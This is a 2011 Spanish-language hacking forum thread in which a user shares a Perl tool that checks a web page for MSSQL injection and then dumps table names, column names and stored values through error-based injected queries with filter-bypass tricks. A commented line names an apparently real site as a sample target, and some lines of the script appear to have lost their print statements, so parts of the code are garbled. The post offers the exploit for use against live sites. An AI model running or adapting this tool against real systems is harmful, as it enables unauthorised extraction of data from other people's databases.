Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] MSSQL T00l

  • 1 Respuestas
  • 1532 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:47:39 pm »
Bueno , aca les traigo una tool en perl para
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.

Código: Perl
  1. #!usr/bin/perl
  2. #MSSQL T00l
  3. #(C) Doddy Hackman 2011
  4.  
  5.  
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common;
  8.  
  9. my $nave = LWP::UserAgent->new();
  10. $nave->timeout(13);
  11. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  12.  
  13. sub head {
  14.  
  15.  @@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@  
  16.  @@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@  
  17.  @@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@  
  18. @@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@  
  19. @@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@  
  20. @@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@  
  21. @@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
  22.                                                                  
  23.  
  24.  
  25. );
  26. }
  27.  
  28. sub copyright {
  29. print "\n\n(C) Doddy Hackman 2011\n\n";
  30. <stdin>;
  31. exit(1);
  32. }
  33.  
  34. repe();
  35.  
  36. sub repe {
  37.  
  38. system("cls");
  39.  
  40.  
  41. head();
  42.  
  43.  
  44. print "\n\n[Page] : ";
  45. chomp(my $page=<stdin>);
  46.  
  47. $code = toma($page);
  48.  
  49. if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
  50. print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
  51. } else {
  52. print "\n\n[-] Not vulnerable\n\n";
  53. #copyright();
  54. }
  55.  
  56. menu:
  57.  
  58.  
  59. ##################################
  60.  
  61. 1 - Dump tables
  62. 2 - Dump Columns of the a table
  63. 3 - Dump values
  64. 4 - Change target
  65. 5 - Exit
  66.  
  67. ##################################
  68.  
  69.  
  70. );
  71.  
  72. print "[Opcion] : ";
  73. chomp(my $op=<stdin>);
  74.  
  75. if ($op eq 1) {
  76. print "\n\n[*] Dumping tables...\n\n";
  77. mssql_tables($page);
  78. goto menu;
  79. }
  80. elsif ($op eq 2) {
  81. print "\n\n[Table] : ";
  82. chomp (my $tab = <stdin>);
  83. print "\n\n[*] Dumping columns..\n\n";
  84. mssql_columns($page,$tab);
  85. goto menu;
  86. }
  87. elsif($op eq 3) {
  88. print "\n\n[Table] : ";
  89. chomp (my $tab=<stdin>);
  90. print "\n\n[Column] : ";
  91. chomp(my $col=<stdin>);
  92. print "\n\n[*] Dumping values..\n\n";
  93. mssql_data($page,$tab,$col);
  94. goto menu;
  95. }
  96. elsif ($op eq 4) {
  97. repe();
  98. }
  99. elsif ($op eq 5) {
  100. copyright();
  101. }
  102. else {
  103. goto menu;
  104. }
  105.  
  106. #@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");
  107.  
  108.  
  109. sub mssql_columns {
  110. ($pass1,$pass2) =  bypass("--");
  111. my $sir;
  112. for (1..666) {
  113. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  114. $code = toma($_[0].$path);
  115. if ($code=~/value '(.*?)' to/ig) {
  116. $sir.= ",'".$1."'";
  117. print "[Column found : $1]\n";
  118. } else {
  119. print "\n\n[+] Finish\n";
  120. last;
  121. }
  122. }
  123. }
  124.  
  125. sub mssql_tables {
  126. ($pass1,$pass2) =  bypass("--");
  127. my $sir;
  128. for (1..666) {
  129. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  130. #print "$path\n";
  131. $code = toma($_[0].$path);
  132. if ($code=~/value '(.*?)' to/ig) {
  133. $sir.= ",'".$1."'";
  134. print "[Table found : $1]\n";
  135. } else {
  136. print "\n\n[+] Finish\n";
  137. last;
  138. }
  139. }
  140. }
  141.  
  142. sub mssql_data {
  143. ($pass1,$pass2) =  bypass("--");
  144. my $sir;
  145. for (1..666) {
  146. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  147. #print "$path\n";
  148. $code = toma($_[0].$path);
  149. if ($code=~/value '(.*?)' to/ig) {
  150. $sir.= ",'".$1."'";
  151. print "[Data found : $1]\n";
  152. } else {
  153. print "\n\n[+] Finish\n";
  154. last;
  155. }
  156. }
  157. }
  158. }
  159.  
  160. sub bypass {
  161. if ($_[0] eq "/*") { return ("/**/","/*"); }
  162. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  163. else {return ("+","--");}}
  164.  
  165.  
  166. sub toma {
  167. return $nave->request(GET $_[0])->content;
  168. }
  169.  
  170.  
  171. # ¿ The End ?
  172.  


Si lo quieren descargar desde sourceforge

Código: [Seleccionar]
https://sourceforge.net/projects/mssqltool/
« Última modificación: Marzo 14, 2015, 10:16:28 am por Expermicid »

Desconectado SPELINAX

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    0%
  • Reputación 0
  • Un clásico carder de los 90's (ci)
    • Ver Perfil
    • YouTube Channel
    • Email
« Respuesta #1 en: Noviembre 22, 2011, 04:45:15 pm »
Gracias haber si me sirve.
[Ð.Ţ.Ρ] [2007] †.: SǷ£ĻΐИΩХ :.† [2007] [Ð.Ţ.Ρ]


 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3512
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1745
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1440
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
Funciones más utilizadas en la programación de un perl script

Iniciado por Dragora

Respuestas: 0
Vistas: 1093
Último mensaje Enero 06, 2019, 01:01:06 am
por Dragora
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1495
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear